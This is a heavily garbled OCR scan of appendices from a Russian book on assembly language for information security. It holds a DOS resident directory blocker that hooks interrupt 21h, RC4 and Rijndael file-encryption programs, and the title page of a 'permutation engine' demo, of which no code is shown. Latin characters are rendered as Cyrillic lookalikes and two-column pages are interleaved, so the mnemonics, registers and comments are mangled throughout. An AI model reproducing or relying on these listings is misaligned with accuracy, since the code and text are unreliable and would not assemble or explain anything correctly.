стр ВУТЕ РТВ 43: [51], '\' 
; Проверим, содержит ли неполный путь 
32 Ео1]рабЪ ; начальный '\' 
оу а1, '\' ; Добавим '\' в конец строки 
5 %®-)°) ; полного пути 
ЕаПрабп; ; Добавим путь, указанный в параметре, 
10455 ; в конец строки полного пути 
$ЕозЬ 
ог а1, а1 
37 


еер 
тр Е] ]раеь 


еер: 











Приложение 2. Резидентный блокировщик 


— ” нь 
| ; Сравиним строку полного пути 
р м ; СО строкой параметров в РбР 
Те $1, ОРЕЗЕТ сиграр 
поу 41, 82. 
хог сх, сх 
поу с1, с5: [80%] 
ес сх 
тере спрзь 
рор 45 
рор ез 
рора 
пе ; 
те ов, ; Строки не равны - на старый обработчик 
о С в ; Установим код ошибки - путь не найден 
Риз ЫЬ 5 ; корректируем флаг СЕ, сохраненный в 
ог НОВО РТВ 55: ГБ, оИКаЦИИ ошибки 
ор р ; при выполнении прерывания 
1теё 
014 2 Пр 0 
014 218 ро 0 
ст90е$ ПВ потескоху Тоскег', ОО, ОАН 
' (с) О1еч У. Витда ' 
ОВ ры, бАБ Зи СтЧаеУи 2000 
узета ОВ 'Озаде: А11оск. сот ' 
в ‚оо тесеогу #1 рав", ОРЬ, ОАБ 
118159 ОВ '1п56а11е4', о0ь, 0 
‚ бАБ, '$' 
тепг5а ОВ '8 "С 5 
стра к ов р и СО, бАЬ, "$ 
___ ЕМО Бед1п 


Сразу после 
о у с а онсходит проверка наличия резидентной части программы 
пут а функции мультиплекс 
ного прерывания 2ЕЁВ 
прерывания происхо но, НИ 
дит проверка на вызываем 
м ую функцию, и при совп 
ы процедура выгрузки программы из памяти. ТР ПАОНИИ выполня" 
и отсутс й 
м и резидентной части программы в памяти (код возврата из прерывания 
проверяется наличие параметров командной строки, и при их отсутствии 


арительным выводом сообщения об использова- 
раметра происходит перевод его символов в верхний 


Ш " 
старых и установка "новых" векторов прерываний 


пешной установке и выходом 
И. 


в противном с. 
Рываниь, р лучае происходит передача управле 








й 





510 Ассемблер в задачах защиты информаци, 


ионов о инок пров ио о НВ НИ ово ни о Я Вии виа оао паев ооо рая авео нас и ооо веба оон оно В О а ево ооованны,,, 


происходит переход на выборку параметра в строку пути; если же символ не найден, т 
строка пути сначала заполняется названием диска и текущим путем, а потом уже относи. 
тельным путем, указанным в параметре. Далее осуществляется посимвольное сравнение 
строки пути в Р$Р и строки сформированного полного пути, по которому происходит 
обращение. При совпадении начала строки полного пути со строкой пути в РР происхо- 
дит присвоения кода возврата 3 (путь не найден) и корректируется значение флага СЕ 
в стеке для индикации ошибки. Таким образом защищается не только директория, ука. 
занная при запуске в командной строке, но и все ее поддиректории. Если результат срав- 
нения отрицательный, происходит переход на старый обработчик прерываиий 211 и дос- 
туп предоставляется. 


Приложение 3 
Реализация алгоритма 
шифрования ВС4 












:с4.азм - программа шифрования файлов 
по алгоритму ВС4. ==========е=====ЕЕ= 
Входные параметры - имена входного и 
ВЫХОДНОГО файлов. ЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕН 
Требует обязательного указания ключа 
шифрования в шестнадцатеричном представлении. 
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. МОБЕЬ Е1пу 
. СОБЕ 
о8б 100ъ 
зфабе ЕО ОРЕЗЕТ зрасе ; Адрес массива состояния 
кеу ЕО ОРРУЕТ зрасе+256 ; Адрес массива ключа 
раЕ ЕО0 ОЕРЗЕТ зрасе+512; Адрес буфера 
Бед1п 
поу Чх, ОРЕЗЕТ издсру 
са11 ЗЕтоцЕ 
; Разбор командной строки 
хот Ьх, Ьх 
оу Ь1, 45: [808] ; Получим длину "хвоста" команды 
с1а 
поу сх, Ьх 
1пс сх 
поУ 91, 818 
поУ ВУТЕ РТВ [Ьх+818], 208 
; Пробел в конец строки 
хог $1, 51 
поу а], 201 
; Найдем в командной строке 
; адреса первых трех параметров 
оу Чх, 3 
рагатз: 
тере зсазЬ 
поУ {10211е+$1], 91 
ес МОКР РТВ [1п1Ё11е+51] 
Терпе — зсазЬ | 
оу ВУТЕ РТК [91-1],0 
ааа 51, 2 
ес ах 
907 рагаи$ 
поУ рх, ЕхЕКеу . 
сир МОВР РТВ {Ьх], 'К/' 
; Третий параметр "/К" ? 
32 рагатзок 
Эпир изаде ; Меньше трех параметров, либо 


третий параметр 
; не "/к" - на выход 





512 Ассемблер в задачах защиты информа Прило ение 3. Реализация алгоритма шифрования КС4 51 
зозоваваноо еее и. ЗЦА Пенни нии 
рагатзок: по [91+5х], а} . 
; Преобразование ключа в поснедовательность байт 1пс 
оу 91, Кеу ‚2 поз аее 
поу 31, Ехекеу откроем файл-источник 
ада $1, 3 ; поУ ах, 3000Ъ 
Ческеу: | ОУ 9х, ЗПЕПе 
поу сх, 2 Е 216 
Бехьу{е: пс поорег 
104955 Це Чх, ОРЕЗЕТ издорег 
} ог а], а] . ошибка открытия - на выход 
| 37 епахеу . ' са11 $ЕГомЕ 
| стр а1, З91 пр ех1Е 
? ЗЪе пота] рь ег: 
6 — а, бЪ пох = ЗпЬВ@, ах 
поба]1рь: . . создадим файл-приемник 
| апа а1, ОРЬ ; поу ав, ЗСь 
| $81 41, 4 | хог сх, сх 
от 91, а! оу 9х, оцёЕе 
| 1оор ВехБу3е 116 211 
оу а1, 91 3с сгег ; Ощибка создания - на выход 
| 5то$Ь оу оцЕВпа1, ах 
тс хеу1еп ; Цикл шифрования 
пр Ческеу епсоде: 
епаКеу: . оу ав, ЗРЬ ; Прочитаем 16Кб в буфер 
] стр Кеу1еп, 0 ; Ключ нулевой - на выход ПоУ Ьх, 111141 
| 312 кеуок поу сх, 4000. 
поУ Чх, ОРЕУЕТ издкеу поу ах, РоЕ 
са11 $ЕгоцЕ у 116 215 
пр ех с таег ; Ошибка чтения - на выход 
хеуок: ох ах, ах ы 
} Заполнение массива состояний и развертывание ключа 32 епдепс ; Конец файла - шифрование окончено 
| оу 41, збафе поу 51, эбабе 
| Се 51, Кеу оу 91, БаЕ 
доу Ах, Кеу1еп поу 4х, ах 
хот рх, 5х хот Ьх, Бх 
| хог Бр, Бр хог ‹ сх, сх 
| депз: оу Ь], х 
| оу а1, [$1+Ьр] поУ с]; у 
| ме [91+5х], Б1 Хог Ьр, Бр 
оу [$1+5х], а1 ; Шифрование содержимого буфера 
пс Бр 1оорепс; 
| сир Бр, ах 11 Ь 
317 подКеу оу аб, [$1+5х] 
| хог Бр, Бр ааа с], ав 
| поакеу: поу а], ан 
пс Ь1 хсв9 сх, Ъх 


| 107 деп$ хсНа ай, [31+5х] 
| ; Преобразование массива состояний по ключу ааа а1, ан 
| оу 51, Кеу ХСН сх, Ьх 
оу 91, збахе поу [31+5х], ай 
хох [91+5р], а1 
Тс Бр 
сир Бр, ах 
302 фоорепс 
поУ х, Б1 
ет у, с1 
} Сохраним зашифрованный буфер 


| хог Бр, Бр 

| хог сх, сх 

| хот Ьх, Ьх 

| поз асе: 

] ааа с1, [51+5х] 
пох а1, {91+5х] 
ааа с1, а1 
поУ Бр, сх 
хера а], [91+Ър] 





























ап, 
Ьх, 
сх, 
ах, 
211 


40% 


оц впа1 


ах 
раЕ 


мгег 
епсо4де 


ап, 
Ьх, 
218 


ЗЕВ 
1п0ра1 


с1ег 


ап, 


Ьх, опЕрпа1 


21% 


ЗЕВ 


с]ег 


201 


Ассемблер в задачах защиты унформаци 


; Ошибка записи - на выход 


; Закроем файлы 


; Ошибка закрытия - на выход 


; Ошибка закрытия - на выход 


; Выход 


; Вывод сообщения об ошибке создания 
Чх, ОЕЕЗЕТ пздсгег 
5Егоце 
ех1е 


; Вывод сообщения об ошибке закрытия 
Ях, ОГЕЗЕТ пзас1ег 
ЗЕГОМЕ 
ех1( 


; Вывод сообщения об ошибке чтения 


Чх, ОРЕЗЕТ шзагаег 
ЗЕгооЕ 
ех1 


; Вывод сообщения об ошибке записи 
4х, ОРЕЗЕТ издчгег 
ЗЕГОЧЕ 
ех1Е 


; Вывод сообщения об использовании 


; Процедура вывода сообщения 


ар, 


514 
Те 
ПоУ 
поу 
поу 
116 
с 
Эпир 
епдепс: 
воУ 
поУ 
11Е 
3с 
поу 
поу 
106 
3с 
ех1Е: 
116 
сгег: 
оу 
са! 1 
ар 
с1ет: 
поу 
са11 
ар 
г4ег: 
поУ 
са]11 
ар 
мгег: 
ет 
са11 
у ар 
изаде: 
поу 
са! 1 
ар 
5ЕгочЕ: 
шоу 
116 
те 
11Е]е 
оч Е11е ПМ 
{хЕКеу 
116091 
оцЕВпа1 ОИ 
хеу1еп 
х 
у 
059сру 


4х, ОРЕЗЕТ издазе 


ЗЕгое 
ех1е 


о9ь 


211 


ОИ 
0 

р 
ОИ 
0 

и 
и 
| 
ОВ 
ОВ 


>> 


> > > эо 


; Адрес имени файла-источника 
; Адрес имени файла-приемника 

; Адрес текстового ключа 

; Дескриптор файла-источника 
; Дескриптор файла-приемника 

; Длина ключа 

; Переменная цикла шифрования 

; Переменная цикла шифрования 


'8С4 Сгурбог', ОБЬ, ОАВ 
'(с) 01е4а У. Витдаеу, 2001' 





Приложение 3. Реализация алгоритма шифрования ВС4 


нии ии ии инновация новпввцан лань 515 


ОВ Орр, Оль, '5' 
:59и5е в 'Озаде: тс4. сов ' 
<5тс Е1]е> <аезе #Е11е> : ' 
к ОВ ООВ А те? КЕ <Кер 
пзакеу 'Тпуа]14 кеу', Орь, ОбАВ, '5' 
пвдорег ОВ "Сап' "Е орел Еее ЗОВ, би 7 
пздсгег В 'Сап''Е стеафе ЁЕ1]е', Орь, ОАв, '5' 
пзас1ег ОВ 'Сап''Е с105е #11е', орь, САБ, "51 
пзатаег ОВ реет" "Е теа@ Егош Е11е', ОБЬ, ОАН 
1$! ' 
пзаитег РВ роет" "Е иг Се Ко Е11е', ООЬ, ОА 
1$! 
5расе 
ЕАО Беа1п 


После запуска программы происходит разбор параметров командной строки. Первы 
три параметра преобразуются в АЗСПИ строки, а их адреса помещаются в пе мень е 
ПМЕШЕ, ОЧТЕЦЕ, ТХТКЕУ соответственно. Затем происходит равнение. ет и 
параметра со строкой "/К", т. е. проверяется, является ли третий параметр до и ыы 
и имеется ли достаточное количество параметров на входе, так как если их меньше тов 
то адрес третьего параметра так и останется нулевым, как это определено изначально 
При неправильном задании входных параметров происходит переход на проце ны, 
вода информации об использовании программы и завершения программы РОТеТУру вы 

После положительного результата проверки происходит преобразование ключевой 
информации из текстовой формы в двоичную. При нулевой длине ключа про 
завершается с предупреждением о неверном ключе. отрамма 


После завершении процедуры разворачивания ключа и перемешивания массива состоя- 
и аотицы замен 5-блока) открывается файл-источник и создается файл-приемник 
м вето цикл шифрования — из файла-источника ‘считывается в буфер 16Кб, происходят 

р е содержимого буфера и запись его в файл-приемник. Если после вызова функ- 
ции чтения из файла получаем в АХ ноль, это означает, что файл считан до конца, и поэт. 


му осуществляется выход из 

цикла. После завершения шифрова й 
ния закрыв 

и происходит выход из программы. ы “Рываются файлы 





17 



































Приложение 4 
Реализация алгоритма 
шифрования В цпдае] 


Шифрование осуществляется в режиме гаммирования (ОГВ). Входными параметрами 
программы являются имена входного и выходного файлов, а также файла-ключа, содер. 
жащего начальное значение состояния и ключ. Дополнительно могут указыватся размер 
блока (4, 6, 8 — 128, 192 и 256 бит соответственно) и размер ключа (аналогично), 
По умолчанию размер блока и ключа приняты равными 4. 

Алгоритм работы программы: 


1) разбор параметров; 

2) чтение данных в массив ключа; 

3) генерация таблиц, необходимых для работы процедур цикла шифрования; 
4) вычисляется число раундов шифрования; 

5) открываются файл-источник и файл-приемник; 

6) чтение из файла-источника блока данных; 

7) генерация нового состояния; 


8) сложение по модулю два блока данных и нового состояния и запись результата 
в файл-приемник; 


9) повторение шагов 6-8 до тех пор, пока не будет исчерпан файл-источник; 
10) закрытие файлов; 
11) завершение программы 
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. МОБЕЬ пу 

. СОБЕ 

ОВС 100% 
РЕБ] ЕОП ОЕЕЗЕТ ЕаБ1ез 
РИЕБ ЕОП ОРРЗЕТ {аБ1е$+100\ 
зБох ЕО0 ОРЕЗЕТ {аБ1е$+2008 
$1Бох ЕОУ ОРЕЗЕТ Еа1е5+3001 
тсой ЕСО ОРЕЗЕТ $аБ1е$+4008 
зфафе Е00 ОРЕЗЕТ +аБ1е5+4205 
{збасе ЕО0 ОРЕЗЕТ {аБ1е$+4400 
Кеу ЕО0 ОГЕЗЕТ ГаБ]е5+4601 
БаЕЕ ЕОП ОРЕЗЕТ {аБ1ез;+640. 
Бед1п 

ел Ах, ОРЕЗЕТ издсру 


са11 5ЕГоцЕ 





п риложение * 4. Реализация алгоритма шифрования Кпдае! 


; Разбор параметров 


зан оное Оооо на ор ово вос ноочованио вая 


; Получим длину 
; "хвоста" команды 


; Пробел в конец строки 


хог рх, Ьх 
поУ Ь1, 4$: [800] 
с1а 
поу сх, Бх 
10с сх 
поу 91, 818 
поУ ВУТЕ РТВ [Ьх+818], 208 
хог $1, 51 
оу а1, 20% 
; Найдем в командной строке адреса первых 5 параметров 
поу ах, 5 
агам$: 

ее зсазЪ 
ох сх, сх 
32 @ерагат 
поу [1121]е+$1], @1 
Чес ИМОВР РТВ [10Ё1]е+51] 

терпе зсазь 
ПоУ ВУТЕ РТВ [91-1], 0 
аая 81, 2 
ог сх, сх 
32 берагат 
ес ах 
] 12 @рагаш$ 

верагам; 


; Проверим, есть ли хотя бы 3 параметра 


сир КеуЕ11е, 0 
302 
ар 


@рагамзок 
@и5аде 


; Разбор параметров, определяющих 
; размер ключа и массива состояния 


@рагамзок: 


@ркь: 


поу 
стр 


32 
сир 


Ьх, Кеуп 
Ьх, 0 


@рагок 
МОВР РТВ {Ъх], 'Х/' 


; Модификация размера ключа 


32 
стр 


@ргоскк 
Вр РТВ [Ьх], 'Ъ/' 


} Модификация размера массива состояния 


32 
врага: 


вргоскк: 


@ргоськ 
@изаде 


Ъх, Ыкр 
@рагок 
Ьх, БК 
@ркь 


а1, ВУТЕ РТВ {рх+3] 
а], '4' 

@5еЕКк 

а1, '6' 


; Нет ключа - параметры 


; По умолчанию 














@зеЕК: 


@ргосЬК: 


@зеть: 


@рагок: 


@пгок: 


@т] оор: 


@тЧок: 





Ассемблер в задачах защиты информации д 


зоо ао ооо оо во вари и ов оо ооо обоин ово рра вов вв вооон ина, 1 


32 @зеек 

сир а], '8' 

92 @зеёк 

Эпр @1пукеу ; Неправильная длина ключа 
апа ах, ОЕБ 

поу пк, ах 

тр @раг2 

ел а1, ВУТЕ РТВ [5х+3] 

стр а], '4' 

32 @5еЕЪ 

сир а1, '6' 

32 @зееь 

сир а1, !8' 

32 @зеь 

Эпир @1пУ К ; Неправильная длина блока 
апа ах, ОЕВ 

ел пЬ, ах . 

тер @раг2 


; Чтение ключевой информации 
са11 @гаКеу 

; Генерация таблиц 
са11 депрЕ 1 


са11 депзЬох 
са11 дептсоп 
; Вычисление числа раундов 
воу ах, НОВО РТК пЬ 
поу КОВР РТВ пг, ах 
поу ах, МОВО РТВ пк 
стр МОК РТВ пг, ах 
]ае @пгок 
поу МОВР РТВ пг, ах 
ааа МОВР РТК пг, 6 
; Расширение ключа 
са! 1 Кеуехрап1оп 
; Открытие файлов 
са]1 @ореп1п 
са11 @орепоце 


; Цикл шифрования 


; Чтение из файла 


поУ ап, ЗРВ 
ет Ьх, 10191 
поу сх, ПЬ 
$5] сх, 2 
поУ ах, БаЕЕ 
116 218 

Эпс @таок 
пр @:ег 

ог ах, ах 
32 @епаепс 
поУ теа@, ах 


; Ошибка чтения - на выход 


; Конец файла - на выход 
; Сохраним число 
; считанных байт 









; Генерация очередного блока состояния 


Поу ИМОКО РТВ К, 0 ; Обнулим указат 
са11 аЧ9Ч9гочпЯКеу ; Сложим массив остояныа 
поУ сх, МОВР РТВ пг ; Цикл гена ии © 
по сх ; рации состояния 

вегоцп@$: 
разв сх 
са11 русезаь 
са11 $В1ЕЕтгом 
са1] хопи 
са! 1 аЧ9Ч9гоилЯКеу 
рор сх 
]оор @етоппа5 
; Последний такт цикла генерации 
са]11 русезоь 
са11 $51 ЕЕгоч 
са]1 ааа9гоолаКеу 
; Сложим буфер с массивом состояний 
поу Ьх, п 
$01 Ьх, 2 
поУ Ах, ьх 
@хог: 
поУ а1, зкабе[Ъх] 
хог БаЕЕ[Ьх], а] 
ес рх 
31$ @хох 
; Сохраним буфер 
поУ ар, 408 
поу Ьх, овЕВпа1 
поу сх, геа4 
не ах, БаЕЕ 
1 211 
Эс @иток 
виток: ТР пмтег 
ел ах, п 
351 ах, 2 
сир ах, геа4 } Проверим, не достигнут ли 
| ; конец файла 
елаепс: 372 @п]оор 
; Закрытие файлов 
поу ар, ЗЕВ 
поу Ьх, 1аНпа1 
116 211 
поу ав, ЗЕв 
поУ Ьх, овЕНпа] 
еже. 1пЕ 218 
10 208 


ыарочедура загрузки ключ 


; Откроем файл 


: Выход из п Мыы 
: огра 
евых данных рогр 


Шоу ах, 3000, 
оу Ах, КеуЕПе 
11 21 
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с @орег ]пр @ех1+ 
ОУ Хеуйп91, ах дет: 
; Считаем данные в массив состояния вод сообщения об ошибке чтения 
оу Ьх, ах . ! ие 9х, ОРЕЗЕТ мзагаег 
поу ан, ЗЕй са11 ЗЕ гое 
ПОУ сх, ПБ . Эпр @ех1 
. ` $51 сх, 2 дите: 
поу Чх, зтасе " ‘вывод сообщения об ошибке записи 
10% 211 ' ет 9х, ОРЕЗЕТ пздмгех 
с @тЗег Са11 зе тоце 
; Считаем данные в ключевой массив Эр бех1е 
ем Ьх, Кеуппа1 ‚ Процедура применения преобразования замены байтов к массиву состояния 
поу ав, ЗРА русезиь РВОС МЕАВ 
поу сх, пк у поу Ьр, МОВО РТВ пЬ 
$81 сх, 2 хог Ьх, Бх 
поу 4х, Кеу у $21 Ьр, 2 
110% 21 дес Бр 
с @у4ег Ь: 
; Закроем файл вр оу Ь1, зкахе[Ър] 
поу Ьх, Кеурпа]1 пох - Ь, зБох[Ьх] 
ет ан, ЗЕВ оу зкасе[Ьр], 51 
10 218 Чес Ьр 
ге , )пз @пьзчЬ 
; Процедура открытия файла-источника те 
Форепп: рукезар ЕМОР 
поу ах, 30001 ; Процедура сдвига строк 
ме 9х, зпЕПе зп: Еекгом РКОС МЕАВ 
10% 211 | сир МОВР РТВ пЬ, 4 
3с борег 912 @зтЬб 
ие 11191, ах | . 
в ПоУ а1, ВУТЕ РТВ Кафе [1] 
; Процедура создания файла-приемника хсва а1, ВУТЕ РТВ з$афсе[13] 
@орепоце: хсва а1, ВУТЕ РТВ зфабе[9] 
оу ап, ЗСв хсва а1, ВУТЕ РТВ з5аке[5] 
хог сх, сх хсйд а1, ВУТЕ РТВ збабе[1 
ПоУ 9х, ощеЕ11е | _ 
11 211 хср9 а1, ВУТЕ РТВ зкабе[10] 
с @орег хсва а1, ВУТЕ РТВ з{афе[2 
поУ оцеВпЯ1, ах : ем а1, ВУТЕ РТВ збате[6] 
ге | хс19 а1, ВУТЕ РТВ збабе[14] 
@изаае: хсйа а1, ВУТЕ РТВ зтасе [6 
; Вывод сообщения об использовании программы 
ЦоУ Чх, ОРЕУЕТ пзайзе поУ а1, ВУТЕ РТВ збабе[3] 
са11 Его хсв9 а1, ВУТЕ РТВ зфабе[7] 
Эмр вех хсНа а1, ВУТЕ РТК збафсе[11] 
@1рукеу: хспа а1, ВУТЕ РТВ збабе [15] 
; Вывод сообщения о неправильной длине ключа хсвд а1, ВУТЕ РТК зкате[3 
оу Чх, ОРЕЗЕТ пзакеу 
са11 зЕгоце ее 
Зпр @ех1е зпЬб: 
в пу: Чзпьб стр МОВО РТВ пЬ, 6 
; Вывод сообщения о неправильной длине блока . 312 @5158 
ОУ Чх, ОРЕЗЕТ пак . 
са11 зтощ : р вт поу а!, ВУТЕ РТВ зкабе[1] 
Эр @ех1 ьр хсв9 а1, ВУТЕ РТВ збаке [21] 
ворег: 1. ха — а], ВУТЕ РТВ збахе[17] 
; Вывод сообщения об ошибке открытия Е хсва а1, ВУТЕ РТВ зфафе [13] 
поУ Чх, ОРЕЗЕТ пздорег Г’ 


са1] ЗЕгоце 





№ 


т 
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хсВа а1, ВУТЕ РТВ збате[9] 
хсрва а1, ВУТЕ РТВ зфаке[5] гее 
хсва а1, ВУТЕ РТВ эбабсе[1] ЗНА РСгом ЕКО 
Процедура перемешивания столбцов 
оу а1, ВУТЕ РТВ зфафе[2] Я хсотипл РВОС МЕАВ 
хсВа а1, ВУТЕ РТВ збафе[18} хог = Вх, Ьх 
оу а1, ВУТЕ РТВ зкабсе[2] ПоУ 91, МОВО РТВ пЬ 
хсва а1, ВУТЕ РТВ зкабе[10] дес 91 
хсП9 а1, ВУТЕ РТВ зкафе [2] @со1$: 
ие а1, ВУТЕ РТВ збабе[6] : ие сх, 4 
хспа а1, ВУТЕ РТВ збаке[22] ие $1, 91 
хСНа а1, ВУТЕ РТВ зсасе [14] | $81 $1, 2 
хсва а1, ВУТЕ РТВ з6ахе[6} | , @со1 : 
хог ах, ах 
поУ а1, ВУТЕ РТВ зфафе[3] оу Ьр, 3 
хсва а1, ВУТЕ РТВ звафёе[15] @гом: 
хсва а1, ВУТЕ РТВ зфасе[3} оу Ь], зфате [Юр+31] 
оу а1, ВУТЕ РТВ зфафе [7] хог а], а\ 
хспа а1, ВУТЕ РТВ зхафе [19] | ог Ы, 51 
хсва а1, ВУТЕ РТВ зкаёе[7] 32 @52ех 
ОУ а1, ВУТЕ РТВ зфафе [11] пу а1, р: [Ъх] 
хсй9 а1, ВУТЕ РТВ збабе [23] поУ Ь1, п1хр [ЮР] 
хсва а1, ВУТЕ РТВ зфафе [11] а94 а1, р1{р1 [5х] 
Эпс @поес 
ге 1пс а1 
@5пЬ8: @пофс: 
оу а1, ВУТЕ РТВ зкасе[1] оу Ь1, а1 
хсВа а1, ВУТЕ РТВ баке [29] оу а1, РЕБ [ЬХ] 
хсва а1, ВУТЕ РТВ зкабе [25] @52ег: 
хсва а1, ВУТЕ РТВ зфате[21] хох 91, а1 
хспа а1, ВУТЕ РТВ зфабе [17] дес 
хсва а1, ВУТЕ РТВ збафе[13] 908 @гом 
хСВа а1, ВУТЕ РТВ збабе[9 оу Ьр, сх 
хспа а1, ВУТЕ РТВ збабе[5 дес Бр 
хсва а], ВУТЕ РТВ заке[1 . поу Езсабе[Ьр+$1], 41 
ПоУ а1, м1хр[0] 
поу а1, ВУТЕ РТВ зфаке [2] хсп9 а1, м1хр[3] 
хсва а1, ВУТЕ РТВ зкафе[22] хсва а1, м1хр[2] 
хсВа а1, ВУТЕ РТВ зтасе [10] | хсв9 а1, м1хр[1] 
хсВ9 а1, ВУТЕ РТВ зкасе [30] хсН9 а1, м1хр[0] 
хсй9 а1, ВУТЕ РТВ зхате [18] 1оор @со1 
хсва а1, ВУТЕ РТВ звасе[6] дес 9 
хсВ9 а1, ВУТЕ РТВ зкаке[26] : 915 @со13 
хсва а1, ВУТЕ РТВ зфасе [14] ` 
хсва а1, ВУТЕ РТВ эбаке[2} оу Ьх, МОВО РТВ пЬ 
311 Ьх, 2 
оу а1, ВУТЕ РТВ з5афе[3} | ес ` Вх 
хсва а1, ВУТЕ РТВ зфаке(19 м5Сасе: 
хсрд а!, ВУТЕ РТВ зфафе(3] поу а1, зсате[Ьх] 
поу а1, ВУТЕ РТВ збафе[7] поу зтасе[рх], а] 
хсв9 а1, ВУТЕ РТВ зтаке[23] 4ес Ьх 
хсва а1, ВУТЕ РТВ зваке[7] )п$ @тосасе 
ем а1, ВУТЕ РТВ збабе [11} 
хова а1, ВУТЕ РТВ зЕабе [27] тах хет 
хср4 — а]1, ВУТЕ РТВ звабе [11] ; ХС ал ЕМОР 
оу а1, ВУТЕ РТВ збасе [15] ааа цедура сложения с раундовым ключом 
хср4 — а1, ВУТЕ РТВ зкате [31] топпакеу РВОС МЕАК 
хсва а1, ВУТЕ РТВ 








зфахе [15] р оу 31, МОВО РТВ К 
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$01 31, 2 
ОУ Ьх, НОВО РТВ пЬ 
ааа МОВО РТВ К, Ьх 
$01 Ьх, 2 
Чес Ьх 
Фадак: 
мел а1, Кеу[5х+$1} 
хох з{ате [5х], а1 
дес Ьх 
]п5 @ааак 
ге 
а9агоппаКеу ЕМОР 
; Процедура расширения ключа 
Кеуехрапз1оп РКОС МЕАВ 
поУ ах, НОВО РТВ пг 
1пс а] 
и] МОВО РТВ пЬ 
оу МОВО РТВ Кеу1еп, ах 
хог 91, 91 
Ме Ьр, ИОВО РТК пк 
@Копеег: 
оу сх, МОВО РТА пк 
@К1ппег: 
поУ Ьх, НОВО РТВ Бр 
Чес Ьх 
$11 Ьх, 2 
оу 31, 3 
@Есемр: 
ОУ а1, Кеу[Ъх+$1} 
оу Сетр[$1], а1 
Чес $1 
]пз @Есетр 
спр сх, МОВО РТВ пк 
32 @ргоспк 
спр МОВО РТА пк, 8 
3072 вехр 
стр сх, 4 
32 @ргос8 
пр вехр 
@ргос8: 
хог Ьх, Бх 
поу 81, 3 
@8зрусех: 
оу Ь], сетр[ $1] 
оу Ь], зрох[Ъх] 
оу $етр[ $1], 51 
дес $1 
) 03 . 8 зрусех 
тр @ехр 
@рхгоспк: 
хспа а1, ВУТЕ РТВ {епр[3] 
хспа а], ВУТЕ РТВ «епр[2] 
хспа а1, ВУТЕ РТВ Кемр[1] 
хсва а1, ВУТЕ РТВ Кепр [0] 
хог Ьх, Бх 
поу 81, 3 
@зБусе: 
ПоУ Ь1, семр[$1] 
ме р, зрох[Ьх] 
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оу 
дес 
)пз 
ие 
хог 
вехр: 
ие 
вспехе: 


@К1ппегх: 


@Копкегх: 
пр 
ге 


Кеуехрап$1оп ЕМОР 





@зБусе 
а1, гсоп [91] 
ВУТЕ РТВ $епр[0], а] 


81, 3 


Ьх, Бр 
рх, МОВО РТВ пк 
2 


а], Кеу[Ъх+31] 
а1, ВУТЕ РТВ сепр [51] 
Ьх, ИОВО РТВ Бр 


Ьх, 2 

Кеу [Ьх+51], а1 
$1 

@спехё 

Ьх, Ь 

Ьх р 

Ьх, 2 

$1, 3 

Бр 

@К: ппегх 


91 
Ьр, Кеу1еп 
@Кочсехх 


@К1ппег 


@Коцеехг 


; Процедура генерации массива гсоп 


депгсоп РВОС МЕАВ 
хог 
хог 


МОУ 
9епт: 


с1с 
ОУ 


тогпоа: 


Чептсоп ЕМОР 


рх, Бх 
сх, сх 
ах, 1 


ВУТЕ РТВ гсоп[Ьх], а1 
а1, 1 

@похтоЯ 

а1, 1ВВ 


Ь1 
Ь, 30 


@депх 


Г Процедура генерации таблии 


ЗепрЕЪ] РВОС МЕАВ 
с1с 
хог 
хог 
ет 


5х, Бх 
сх, сх 
ах, 1 
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@депр: 
ее С], а\ 
ус] а1, 1 
) пс @попоЯ 
хох а1, 1ВВ 
@пото9: 
хог а1, с1 
поУ ВУТЕ РТВ РЕБТ[Ьх], с1 
ие Бр, сх 
оу ВУТЕ РТВ р1еЬ1[Ър], 51 
пс |1 
312 @депр 
ие МОВО РТВ р15Ъ1[0], 0 
ге 


депрер1 ЕМОР 
; Процедура генерации $-блока 
депзрох РВОС МЕАК 


хог Бх, Бх 

Хох ах, ах 
@депз: 

ох Ь, 1 

32 @2его 

ет а1, ОЕЕН 

заб а1, р1%Ь1 [Бх] 

ОУ Бр, ах 

ме а1, рЕБ1 [Бр] 

поУ ан, а1 

ОУ сх, 4 
311%: 

#01 ай, 1 

хох а1, ай 

1оор аз Ее 
@2его: 

хог ав, ай 

хог а1, 63 

поУ зБох [Ьх], а] 

оу Ьр, ах 

ПоУ з1рох{Ьр], Р1 

1пс Ы 

912 @чеп5 

хе! 


депзБох ЕМОР 
; Процедура вывода строки 


зЕгоце РВОС МЕАВ 
оу ан, 091 
10 218 
ге 

зе гойе ЕМОР 

10Е1е ОИ 0 

01{Ё11е М 0 

КеуЁ11е ПМ 0 

Кеуп Ом 0 

Ы Кл 19) 0 

1прпа1 м 0 

оцеппа1 ПМ 0 

Кеувп91 ОМ 0 


пЬ ОМ 4 


— 


Приложение 4. Реализация алгоритма шифрования, В пЧае! 
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сто ыы 


гк 
Пг 

к 
кеу1еп 
теаа 
фетр 
хр 
159сру 


05945е 


пзакеу 
пзаыК 


пзадорег РВ 
п$агаех ОВ 


пзаигег ОВ 


фа] ез: 


ЕО Бед1п 





Ом 
Ом 
Ом 
Ом 
О 
Ом 
И 
ОВ 
ОВ 
ОВ 
ОВ 
ОВ 
ОВ 
ОВ 
ОВ 
ОВ 
ОВ 
ОВ 


>> <> © > 


4 00Р (0) 

ОЗв, 018, 016, 028 

'81)пдае1 Сгуреог', ОБЬ, ОАВ 

' (с) О1еа У. ВигЧаеу, 2001' 

Орь, обАв, '$' 

'0заде: х1)п9ае].сом ' 

«атс е> <4ез%Ё11е> <КеуЁ11е> ' 
‘[/к: <Кеу1еп>] [/Ь: <Б1осК1еп>] ' 

008, САБ, '5' 

*Тпа1 14 Кеу 1епдЕН уа1ше!' 

ОБН, ОАВ, '5' 

'Труа119 Б]оск 1епдЕВ уа1ще!' 

ООВ, бАВ, '5' 


'Сап''6 ореп #11е!', ОЧв, бар, '$' 
'Сап''& геаЯ Ёгом Ё11е!' 


ОВ 


ООВ, ОА, '5' 


‘Сап'‘Е ик1е $о Ё11е!' 


ОВ 


ООН, ОАБ, '$' 














Приложение 5 
Демонстрация механизма 


пермутации 


* 
ХХХ КК ЖХ 


[Е есЕгоп1с Зоч1 3 |] 
| ХЯЖЖЯЖКХ ЖКХ ХХХ | 


| ргезепу$... | 


| 

| **0х4553 Регги асог* **хжяхжхяхххя | 

-------- няне --------= | 

| ОЕМО Регмисаее Епд1пе Ёох Ш1пах | 
(с) Агез 2003 | 


| ХХЯХЯЖЖЯ ЖКХ КК ХХ КЖ КУК ХХХ 
| ЕЯ. 0х4553. 09+ | 


Описание 






иложение 5. ‚ Демонстрация механизма „‚пермутации, 


